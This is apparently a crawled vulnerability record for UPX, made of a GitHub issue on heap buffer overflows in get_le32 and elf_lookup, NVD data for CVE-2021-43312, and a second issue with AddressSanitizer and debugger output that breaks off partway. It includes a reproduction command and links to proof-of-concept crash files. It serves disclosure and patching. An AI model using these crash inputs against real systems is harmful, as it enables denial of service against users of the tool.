(p=0xa1fffd) at bele.h:164 164 return ACC_UA_GET_LE32(p); [ Legend: Modified register | Code | Heap | Stack | String ] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ registers โ”€โ”€โ”€โ”€ $rax : 0x0 $rbx : 0xa7ce93 $rcx : 0x2 $rdx : 0xae $rsp : 0x00007fffffffcc18 โ†’ 0x000000000051249b โ†’ <PackLinuxElf32::elf_lookup(char+0> xor eax, ebp $rbp : 0x8e8223e2 $rsi : 0x0000000000a1fffd โ†’ 0x0000000000a1fffd $rdi : 0x00000000009ed3c0 โ†’ 0x00000000007cd9c0 โ†’ 0x000000000066fe00 โ†’ <N_BELE_RTP::LEPolicy::~LEPolicy()+0> lea rsp, [rsp-0x98] $rip : 0x000000000066f8f8 โ†’ <N_BELE_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR [rsi] $r8 : 0x1f $r9 : 0x3fdf $r10 : 0xae $r11 : 0x1d9577c0 $r12 : 0x0000000000a00030 โ†’ 0x00000000007267a0 โ†’ <vtable+0> add BYTE PTR [rax], al $r13 : 0x0000000000a1fffd โ†’ 0x0000000000a1fffd $r14 : 0x0000000000a00a51 โ†’ 0x0000000000000000 $r15 : 0x00000000007cd9c0 โ†’ 0x000000000066fe00 โ†’ <N_BELE_RTP::LEPolicy::~LEPolicy()+0> lea rsp, [rsp-0x98] $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ stack โ”€โ”€โ”€โ”€ 0x00007fffffffcc18โ”‚+0x0000: 0x000000000051249b โ†’ <PackLinuxElf32::elf_lookup(char+0> xor eax, ebp โ† $rsp 0x00007fffffffcc20โ”‚+0x0008: 0x00000000006cdffe โ†’ "JNI_OnLoad" 0x00007fffffffcc28โ”‚+0x0010: 0x0000000200000000 0x00007fffffffcc30โ”‚+0x0018: 0x000000000900457f 0x00007fffffffcc38โ”‚+0x0020: 0x0000000000000068 ("h"?) 0x00007fffffffcc40โ”‚+0x0028: 0x0000000000000000 0x00007fffffffcc48โ”‚+0x0030: 0x0000000000070000 0x00007fffffffcc50โ”‚+0x0038: 0x0000000000000000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ code:x86:64 โ”€โ”€โ”€โ”€ 0x66f8e7 <N_BELE_RTP::LEPolicy::get32(void+0> mov rcx, QWORD PTR [rsp+0x8] 0x66f8ec <N_BELE_RTP::LEPolicy::get32(void+0> mov rdx, QWORD PTR [rsp] 0x66f8f0 <N_BELE_RTP::LEPolicy::get32(void+0> lea rsp, [rsp+0x98] โ†’ 0x66f8f8 <N_BELE_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR [rsi] 0x66f8fa <N_BELE_RTP::LEPolicy::get32(void+0> ret 0x66f8fb nop DWORD PTR [rax+rax*1+0x0] 0x66f900 <N_BELE_RTP::LEPolicy::get64(void+0> lea rsp, [rsp-0x98] 0x66f908 <N_BELE_RTP::LEPolicy::get64(void+0> mov QWORD PTR [rsp], rdx 0x66f90c <N_BELE_RTP::LEPolicy::get64(void+0> mov QWORD PTR [rsp+0x8], rcx โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ source:bele.h+164 โ”€โ”€โ”€โ”€ 159 } 160 161 inline unsigned get_le32(const void *p) 162 { 163 #if defined(ACC_UA_GET_LE32) โ†’ 164 return ACC_UA_GET_LE32(p); 165 #else 166 return acc_ua_get_le32(p); 167 #endif 168 } 169 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ threads โ”€โ”€โ”€โ”€ [#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ trace โ”€โ”€โ”€โ”€ [#0] 0x66f8f8 โ†’ get_le32(p=0xa1fffd) [#1] 0x66f8f8 โ†’ N_BELE_RTP::LEPolicy::get32(this=0x9ed3c0 <N_BELE_RTP::le_policy>, p=0xa1fffd) [#2] 0x51249b โ†’ Packer::get_te32(this=0xa00030, p=0xa1fffd) [#3] 0x51249b โ†’ PackLinuxElf32::elf_lookup(this=0xa00030, name=0x6cdffe "JNI_OnLoad") [#4] 0x529509 โ†’ PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce10) [#5] 0x52c65e โ†’ PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce10, this=0xa00030) [#6] 0x52c65e โ†’ PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce10, this=0xa00030) [#7] 0x52c65e โ†’ PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce10, this=0xa00030) [#8] 0x52c65e โ†’ PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce10) [#9] 0x60448c โ†’ PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ gefโžค bt #0 0x000000000066f8f8 in get_le32 (p=0xa1fffd) at bele.h:164 #1 N_BELE_RTP::LEPolicy::get32 (this=0x9ed3c0 <N_BELE_RTP::le_policy>, p=0xa1fffd) at bele_policy.h:192 #2 0x000000000051249b in Packer::get_te32 (this=0xa00030, p=0xa1fffd) at packer.h:296 #3 PackLinuxElf32::elf_lookup (this=0xa00030, name=0x6cdffe "JNI_OnLoad") at p_lx_elf.cpp:5382 #4 0x0000000000529509 in PackLinuxElf32::PackLinuxElf32help1 (this=this@entry=0xa00030, f=f@entry=0x7fffffffce10) at p_lx_elf.cpp:315 #5 0x000000000052c65e in PackLinuxElf32Le::PackLinuxElf32Le (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.h:395 #6 PackLinuxElf32x86::PackLinuxElf32x86 (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.cpp:4800 #7 PackBSDElf32x86::PackBSDElf32x86 (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.cpp:4817 #8 PackFreeBSDElf32x86::PackFreeBSDElf32x86 (this=0xa00030, f=0x7fffffffce10) at p_lx_elf.cpp:4828 #9 0x000000000060448c in PackMaster::visitAllPackers (func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) at packmast.cpp:190 #10 0x00000000006072ca in PackMaster::getUnpacker (f=<optimized out>) at packmast.cpp:248 #11 PackMaster::unpack (this=0x7fffffffcfb0, fo=0x7fffffffcee0) at packmast.cpp:266 #12 0x0000000000670dc5 in do_one_file (iname=iname@entry=0x7fffffffdf15 "id:000089,sig:11,src:001286,op:MOpt-core-havoc,rep:2", oname=oname@entry=0x7fffffffd550 "/dev/null") at work.cpp:160 #13 0x000000000067157c in do_files (i=i@entry=0x4, argc=0x5, argv=0x7fffffffdac8) at work.cpp:271 #14 0x00000000004056a1 in main (argc=0x5, argv=0x7fffffffdac8) at main.cpp:1538 ``` Deferencing a generic poniter 'p' trigger the overflow. ```cpp gefโžค p *p Attempt to dereference a generic pointer. gefโžค p p $1 = (const void *) 0xa1fffd ``` Essentially, the problem is caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382 ```cpp do if (0==((h ^ get_te32(hp))>>1)) { unsigned st_name = get_te32(&dsp->st_name); char const *const p = get_str_name(st_name, (unsigned)-1); if (0==strcmp(name, p)) { return dsp; } } while (++dsp, 0==(1u& get_te32(hp++))); ``` Several locations will also trigger vulnerabilities: PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5368 ```cpp unsigned const w = get_te32(&bitmask[(n_bitmask -1) & (h>>5)]); ``` PackLinuxElf64::elf_lookup() at p_lx_elf.cpp:5404 ```cpp for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si])) ``` PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5349 ```cpp for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si])) { char const *const p= get_dynsym_name(si, (unsigned)-1); if (0==strcmp(name, p)) { return &dynsym[si]; } } ``` ## What should have happened? Decompress a crafted/suspicious file. ## Do you have an idea for a solution? We are very grateful to @jreiser for patching the bucket in p_lx_elf.cpp in the [issue 365](https://github.com/upx/upx/issues/365). However, in fact, all places involving get_te32 () should be strengthened in upx, especially in p_lx_elf.cpp. The four positions we reported should be patched at least: 1) p_lx_elf.cpp:5382 2) p_lx_elf.cpp:5368 3) p_lx_elf.cpp:5404 4) p_lx_elf.cpp:5349 ## How can we reproduce the issue? 1. compile upx with address-sanitize 2. execute cmd ```bash upx.out -df $PoC -o /dev/null ``` p_lx_elf.cpp:5382 [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5382) can be found here. p_lx_elf.cpp:5368 [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5368) can be found here. p_lx_elf.cpp:5404 [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__elf_lookup5404) can be found here. p_lx_elf.cpp:5349 [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5349) can be found here. ## Please tell us details about your environment. * UPX version used (`upx --version`): ```bash upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch) UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 ``` * Host Operating System and version: Ubuntu 16.04 64-bit * Host CPU architecture: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB * Target Operating System and version: same as Host * Target CPU architecture: same as Host
[bug] multi heap buffer overflows in get_le32()
https://api.github.com/repos/upx/upx/issues/380/comments
2
2020-05-23T14:24:07Z
2023-04-17T18:03:04Z
https://github.com/upx/upx/issues/380
623,670,883
380
4,882
CVE-2021-43312
2023-03-24T20:15:08.270
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/379" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/379" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA", "versionEndExcluding": "4.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/379
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "upx", "upx" ]
## What's the problem (or question)? A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239. ASAN reports: ```bash ==110294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000f760 at pc 0x000000466f38 bp 0x7ffcebb0b6a0 sp 0x7ffcebb0b690 READ of size 4 at 0x63000000f760 thread T0 #0 0x466f37 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5239 #1 0x46f660 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5127 #2 0x46f660 in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:795 #3 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:407 #4 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1008 #5 0x4f34b2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194 #6 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248 #7 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266 #8 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160 #9 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271 #10 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538 #11 0x7f8a7e1c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828) 0x63000000f760 is located 0 bytes to the right of 62304-byte region [0x630000000400,0x63000000f760) allocated by thread T0 here: #0 0x7f8a7edbc602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5239 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) Shadow bytes around the buggy address: 0x0c607fff9e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c607fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa 0x0c607fff9ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==110294==ABORTING ``` Then analysis the reasons for segv by debugging: ```bash Program received signal SIGSEGV, Segmentation fault. 0x000000000053b1a8 in PackLinuxElf64::invert_pt_dynamic (this=this@entry=0xa00030, dynp=<optimized out>) at p_lx_elf.cpp:5239 5239 if (buckets[j]) { [ Legend: Modified register | Code | Heap | Stack | String ] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ registers โ”€โ”€โ”€โ”€ $rax : 0x0 $rbx : 0x0000000000a00030 โ†’ 0x0000000000726a30 โ†’ <vtable+0> add BYTE PTR [rax], al $rcx : 0x180 $rdx : 0xc00 $rsp : 0x00007fffffffcbf0 โ†’ 0x000000000065fa86 โ†’ <mem_size(unsigned+0> mov rax, QWORD PTR [rsp+0x10] $rbp : 0xffffffff $rsi : 0x7aa9 $rdi : 0x0000000000a01548 โ†’ 0x480000104fe81024 $rip : 0x000000000053b1a8 โ†’ <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov eax, DWORD PTR [rdi+rsi*4+0x14] $r8 : 0x12 $r9 : 0xffe0 $r10 : 0xc10 $r11 : 0x7 $r12 : 0x8 $r13 : 0x180 $r14 : 0x0000000000a0f4d8 โ†’ 0x000000000000000d $r15 : 0x0 $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ stack โ”€โ”€โ”€โ”€ 0x00007fffffffcbf0โ”‚+0x0000: 0x000000000065fa86 โ†’ <mem_size(unsigned+0> mov rax, QWORD PTR [rsp+0x10] โ† $rsp 0x00007fffffffcbf8โ”‚+0x0008: 0x0000000000400298 โ†’ add eax, DWORD PTR [rax] 0x00007fffffffcc00โ”‚+0x0010: 0x000000000000ffe0 0x00007fffffffcc08โ”‚+0x0018: 0x000000000000f360 0x00007fffffffcc10โ”‚+0x0020: 0x00007ffff7352260 โ†’ <read+16> cmp rax, 0xfffffffffffff001 0x00007fffffffcc18โ”‚+0x0028: 0x000000000000f360 0x00007fffffffcc20โ”‚+0x0030: 0x00007ffff7362447 โ†’ <lseek64+7> cmp rax, 0xfffffffffffff001 0x00007fffffffcc28โ”‚+0x0038: 0x0000000000539692 โ†’ <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR [rsp+0x10] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ code:x86:64 โ”€โ”€โ”€โ”€ 0x53b197 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rcx, QWORD PTR [rsp+0x8] 0x53b19c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rdx, QWORD PTR [rsp] 0x53b1a0 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp+0x98] โ†’ 0x53b1a8 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov eax, DWORD PTR [rdi+rsi*4+0x14] 0x53b1ac <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> test eax, eax 0x53b1ae <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> je 0x53b235 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+7109> 0x53b1b4 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp-0x98] 0x53b1bc <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp], rdx 0x53b1c0 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp+0x8], rcx 